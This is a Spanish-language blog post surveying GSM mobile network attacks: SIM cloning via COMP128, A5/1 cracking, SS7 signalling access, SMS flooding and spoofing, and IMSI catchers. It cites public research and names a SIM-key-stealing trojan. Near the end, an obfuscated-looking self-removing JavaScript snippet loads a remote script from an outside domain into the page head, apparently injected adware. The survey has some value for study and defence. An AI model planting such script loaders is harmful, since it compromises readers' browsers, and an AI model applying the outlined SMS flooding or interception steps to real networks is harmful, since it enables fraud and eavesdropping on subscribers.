Hacking en redes Moviles

Antes  que nada quisiera dedicar estas lineas a un grande del internet :

Aaron Swartz …

No en vano el inventor de la World Wide Web, Sir Tim Berners-Lee, tuiteó: “Aaron está muerto. Caminantes del mundo, perdimos a uno de nuestros sabios. Hackers por derecho, perdimos a uno de los nuestros. Padres todos, perdimos a un hijo. Lloremos”.

Bueno ahi les dejo algo de información y espero que les sea de muchísima utilidad , pero eso sí el empleo que le den , serán ustedes los responsables, como tema de investigación es fenomenal, existen diversos tipos de ataques que han sido demostrados pero a pesar de haber sido detectadas dichas vulnerabilidades aún la migración del algoritmo utilizado conllevaría elevados costes para las compañías telefónicas, que tendría que reconfigurar el servicio, y posiblemente tener que cambiar incluso ciertos terminales de usuario y/o tarjetas SIM.

1)Ataques al SIM: Persiguen romper los algoritmos de cifrado de la SIM (A3+A8), con objeto de acceder a la clave de la SIM Ki así como al número de IMSI, normalmente con el objetivo de conseguir clonar la tarjeta SIM y realizar llamadas de forma fraudulenta.
Algoritmo COMP128:

Inicialmente se mantuvo en privado desde 1991 hasta 1997, cuando se filtró gran parte del código del mismo; el resto de código que faltaba se obtuvo por ingeniería inversa.
En Abril de 1998 la SDA (Smartcard Developer Association) conjuntamente con dos investigadores de la U.C. de Berkeley (Wagner/Goldberg), hicieron público el primer ataque al COMP128.

Woronscan es una herramienta para el clonado de tarjetas SIM basado en debilidades del algoritmo COMP128, requiere acceso físico a la tarjeta.
Spy-Wokiscan: Troyano que se embebe en software para clonado de SIMs dentro de ciertos paquetes del WoronScan, y que una vez se obtiene la clave, el IMSI envía dicha información a cuentas de correo rusas. Download:
2)Ataques a la señal de radio:

Persiguen conseguir acceder a información confidencial de llamadas, “sniffando” la señal de radio entre la MS y las BTS.
No hay autenticación en la red, por tanto ataques de “Man in the middle” son factibles. Esta señal está cifrada con el algoritmo A5/1, utilizando la clave de sesión generada Kc.
Alex Biryukov, Adi Ahamir y David Wagner, publican un esquema que rompe el algoritmo robusto A5/1, con dos minutos de datos de llamada interceptada; el tiempo de ataque duró solo 1 segundo:

http://cryptome.org/a51-bsw.htm

3)Ataques A5/1 diciembre 2009 (Karsten Nohl, Chris Paget):

Ingredientes necesarios para el éxito (Opensource):
3.1. Máquinas de procesamiento distribuido de alto rendimiento (grid computing):

       Nvidia GTX280: 500 chains/s
       PS3 Cell: 500 chains/s
       ATI HD5870: 500 chains/s

3.2.Software de Parametrización adecuado disponible en:

       https://srlabs.de/decrypting_gsm/
       Tablas generadas y disponibles en Bittorrent.
       http://reflextor.com/e100torrents/

       Un portátil y un equipo de RF .

3.3.Ya no es necesario ni siquiera el equipamiento indicado, es posible hacerlo con dispositivos móviles de $15 que actúan como sniffers corriendo un software de código abierto debidamente modificado.

http://bb.osmocom.org/trac/

De momento sólo compatible con algunos móviles antiguos de Motorola y Sony Ericsson.
Demostrado en la 27th Chaos Communication Congress el pasado 28 de diciembre de 2010:

 http://events.ccc.de/congress/2010/Fahrplan/attachments/1783_101228.27C3.GSM-Sniffing.Nohl_Munaut.pdf.

José Picó y David Perez de Taddong presentaron la demostración práctica en la RootedCON de 2011:

http://www.slideshare.net/rootedcon/david-prez-jos-pic-un-ataque-prctico-contracomunicaciones-mviles-rootedcon-2011
 

http://vimeo.com/27258284

Soluciones  al atque de A5/1
Solución actual: Aplicaciones de cifrado End-to-End: http://www.cellcrypt.com

4)Ataques a la red de señalización

Las transmisiones solamente están cifradas entre el MS y las BTS, el resto tráfico tras las BTS está sin cifrar. Los protocolos dentro de la red del operador (BSSAP,MAP) están sin cifrar, por tanto cualquiera con acceso a la red SS7 puede leer y/o modificar la información en el aire.Por tanto si un hacker consigue acceder a la red de señalización, puede obtener TODA la información sobre las llamadas.Si el hacker accediera a la HLR, podría ser capaz de obtener todas las Ki de todoslos clientes de una red. A pesar de que los algoritmos de cifrado mejoren, la arquitectura de la red GSM seguirá siendo vulnerable a ataques desde dentro y contra la red backbone del operador.

5)Ataques de SMS DoS

Persiguen denegar el servicio de SMS e incluso de voz de un operador, mediante la saturación de canales de tráfico de la red radio, en concreto los canales de control. Como consecuencia de la cada vez mayor interconexión con Internet de los servicios de móvil. En noviembre de 2005, investigadores de la Universidad de Pensilvania publicaron un estudio al respecto, sobre lo sencillo que sería realizar un ataque de DoS sobre toda la ciudad de Manhattan o de Washington D.C. utilizando únicamente un cablemodem Con una botnet se podrían atacar todas las comunicaciones de USA:

http://smsanalysis.org/smsanalysis.pdf

Requisitos para la realización de este tipo de ataques:
-Disponer de un servicio de envío de SMS por Internet.
-Disponer de una lista de Objetivos (móviles) fiable Diferentes formas de obtenerla: (Web scraping, Bluetooth, Contactos sincronizados robados por troyanos,etc…).
-Conocer la política de entrega de SMS del proveedor: Buffer de mensajes, tipo de lista de entrega: LIFO, FIFO y plazo de retención.
-Lanzar ataque distribuido a través de envío simultáneo de SMS por medio de portales SMS disponibles, causando la saturación de los canales de control en la transmisión.

6)Ataques SMS: SMS Spoofing

¿Cómo obtienen beneficio los atacantes del SMS spoofing? Normalmente mediante ingeniería social, animando a llamar a números de alto coste o a acceder a páginas web con malware albergado. Asimismo, potencialmente podrían utilizarse para envío de comunicados erróneos, por ejemplo de servicios bancarios con objeto de animar a los usuarios a facilitar información sensible Ligado al SMShing.

Caso reciente: Atacante envía grandes volúmenes de SMS fraudulentos a clientes de un proveedor italiano a través de un conocido proveedor de móvil. El mensaje solicitaba a los abonados llamar a un número de voz de tarificación adicional. Los abonados italianos pagaban al operador italiano por llamadas de alto coste, y el
operador italiano pagaba la parte proporcional de beneficios a un proveedor del servicio, que a su vez repercutía en el atacante. A los abonados inocentes del proveedor de móvil, cuyos números origen habían
sido falsificados, les facturaban cada mensaje SMS en roaming. El operador se dio cuenta a tiempo y paró la facturación antes de que llegaran a los clientes. Impactos para el negocio: Insatisfacción de clientes, pérdidas derivadas de los costes de envío internacional de móvil, costes a la red receptora de procesamiento
de los SMS Mala imagen para la red receptora y para la red “falsificada”.

7)Ataques Man-in-the-Middle:

Permite obtener información sensible de un móvil objetivo utilizando para ello un dispositivo, IMSI catcher o VBTS (Virtual Base Transceiver Station), que emitiendo con una mayor potencia que la antena legítima del operador induce al dispositivo móvil a registrarse en esta BTS falsa, con objeto de capturar
información sensible del abonado. Permite obtener los IMSI, IMEI de los móviles, la localización de los mismos así como potencialmente poder escuchar y/o interceptar conversaciones telefónicas.

Utilizado habitualmente por las autoridades para llevar a cabo investigaciones. El famoso hacker Kevin Mitnick fue localizado utilizando una técnica similar en los años 90 por el FBI, ayudados por una antena de elevada potencia montada sobre un camión, denominada “triggerfish”. (En España esto violaría el artículo 18.3 de la constitución, deber de secreto de las comunicaciones):

http://www.essortment.com/all/kevinmitnickco_rmap.htm

Equipamiento avanzado para espionaje, mediante la técnica de “IMSI catcher” disponible a la venta en Internet:

http://www.ukspyequipment.com/more/on/details/00052

Bueno muchachos a seguir investigando , que por seguro encontrarán mejores herramientas y técnicas.

arthurhuamanic.blogspot.com.es

(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Dejame un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s